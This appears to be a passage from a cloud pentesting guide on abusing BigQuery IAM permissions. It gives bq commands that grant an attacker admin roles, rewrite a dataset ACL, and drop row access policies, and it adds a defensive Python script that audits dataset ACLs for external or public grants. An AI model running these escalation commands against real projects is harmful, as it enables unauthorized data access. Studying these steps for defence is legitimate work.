```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
  --member='user:<email>' \
  --role='roles/bigquery.admin' \
  <proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy
```
```bash
# Download current permissions, requires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json

## Give permissions to the desired user (edit the "access" list in acl.json first)
bq update --source acl.json <proj>:<dataset>

## Read it with
bq head $PROJECT_ID:<dataset>.<table>
```
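Added here as a defensive example, not code from the original page: a small audit over the ACL file that `bq show --format=prettyjson` writes, flagging the kind of grant the `bq update --source acl.json` step above introduces (an OWNER or admin role handed to an external user, or a public grant). The sample ACL and the trusted domain `example.com` are constructed for illustration.

```python
# Added example (not from the original page): audit a BigQuery dataset ACL as
# dumped by `bq show --format=prettyjson <proj>:<dataset>` and report entries
# that hand control or read access to principals outside the organisation.
# The sample ACL and the trusted domain are constructed assumptions.
import json

# Roles in the dataset "access" list that confer control over the dataset.
PRIVILEGED_ROLES = {"OWNER", "roles/bigquery.admin", "roles/bigquery.dataOwner"}
# Principals that make a grant world-readable.
PUBLIC_GROUPS = {"allUsers", "allAuthenticatedUsers"}


def risky_access_entries(acl_json: str, trusted_domains: set) -> list:
    """Return human-readable findings for suspicious entries in a dataset ACL."""
    access = json.loads(acl_json).get("access", [])
    findings = []
    for entry in access:
        role = entry.get("role", "")
        public = entry.get("specialGroup") or entry.get("iamMember")
        # Public exposure through a special group or an IAM member.
        if public in PUBLIC_GROUPS:
            findings.append(f"public grant: role={role} to {public}")
            continue
        # Privileged role granted to a user/group outside the trusted domains.
        for key in ("userByEmail", "groupByEmail"):
            principal = entry.get(key)
            if principal and role in PRIVILEGED_ROLES:
                domain = principal.rsplit("@", 1)[-1].lower()
                if domain not in trusted_domains:
                    findings.append(f"external {key}: role={role} to {principal}")
        # Whole-domain grants outside the trusted set are broad by definition.
        domain_grant = entry.get("domain")
        if domain_grant and domain_grant.lower() not in trusted_domains:
            findings.append(f"domain grant: role={role} to {domain_grant}")
    return findings


# Constructed sample ACL in the shape `bq show --format=prettyjson` prints.
SAMPLE_ACL = json.dumps({
    "access": [
        {"role": "WRITER", "specialGroup": "projectWriters"},
        {"role": "OWNER", "specialGroup": "projectOwners"},
        {"role": "READER", "userByEmail": "analyst@example.com"},
        {"role": "OWNER", "userByEmail": "attacker@evil-example.net"},
        {"role": "READER", "iamMember": "allUsers"},
    ]
})

if __name__ == "__main__":
    for finding in risky_access_entries(SAMPLE_ACL, {"example.com"}):
        print(finding)
```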
bigquery.tables.setIamPolicy

An attacker could abuse this permission to grant themselves further permissions over a BigQuery table:

```bash
# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
  --member='user:<email>' \
  --role='roles/bigquery.admin' \
  <proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy
```
```bash
# An example filter (term = "Cfba") is used here
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");'
```
```bash
# Remove one
bq query --nouse_legacy_sql 'DROP ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this)
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'
```